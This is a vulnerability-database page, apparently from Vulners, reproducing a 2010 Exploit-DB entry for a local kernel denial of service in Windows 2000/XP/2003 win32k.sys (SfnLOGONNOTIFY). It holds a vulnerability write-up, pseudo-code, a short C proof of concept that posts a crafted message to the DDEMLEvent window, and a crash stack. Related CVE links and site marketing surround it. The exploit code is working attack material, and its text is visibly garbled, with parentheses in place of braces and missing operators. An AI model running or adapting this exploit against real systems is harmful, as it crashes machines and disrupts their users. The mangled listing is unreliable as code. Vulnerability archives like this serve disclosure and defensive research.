Lucene search
+L

Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service

🗓️ 22 Apr 2010 00:00:00Reported by MJ0011Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Microsoft Windows win32k.sys SfnLOGONNOTIFY Local kernel DoS Vulnerability in 2000/XP/200

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-1735
5 May 201018:00
cve
cve
CVE
CVE-2010-1894
11 Aug 201018:00
cve
cvelist
Cvelist
CVE-2010-1735
5 May 201018:00
cvelist
cvelist
Cvelist
CVE-2010-1894
11 Aug 201018:00
cvelist
exploitdb
Exploit DB
Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)
10 Aug 201000:00
exploitdb
euvd
EUVD
EUVD-2010-1755
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2010-1913
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-1735
6 May 201012:47
nvd
nvd
NVD
CVE-2010-1894
11 Aug 201018:47
nvd
openvas
OpenVAS
Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities
13 May 201000:00
openvas
Rows per page
/*
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability

Effect : Microsoft Windows 2000/XP/2003 full patch


Author:MJ0011
Published: 2010-04-22


Vulnerability Details:

Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some
Message, will call gapfnScSendMessage this function table function to process, which under the deal 2000/xp/2003
0x4c No. message, there will be a function called SfnLOGONNOTIFY, this function again when the wParam == 4/13/12
When the data directly from the lParam inside out, despite the use of the function of the SEH, but as long as the kernel passes the wrong address, will still lead to
BSOD

Pseudo-code:

if (wParam == 4 | | wParam == 13 | | wParam == 12)
(
    v18 = * (_DWORD *) lParam;
    v19 = * (_DWORD *) (lParam 4);
    v20 = * (_DWORD *) (lParam 8);
    v21 = * (_DWORD *) (lParam 12);
*/

//Exploit code:

# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\[email protected]\nPressEnter");

getchar();

HWND hwnd = FindWindow ("DDEMLEvent", NULL);

if (hwnd == 0)
(
   printf ("cannot find DDEMLEvent Window! \ n");
   return 0;
)

PostMessage (hwnd, 0x4c, 0x4, 0x80000000);


return 0;
)

Common crash stack:

kd> kc

win32k! SfnLOGONNOTIFY
win32k! xxxDefWindowProc
win32k! xxxEventWndProc
win32k! xxxDispatchMessage
win32k! NtUserDispatchMessage
/*
....

Windows 7/Vista no such problem

Thanks:

Thanks to my colleagues LYL to help me discovered this vulnerability



th_decoder
2010-04-22
*/

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.02959
34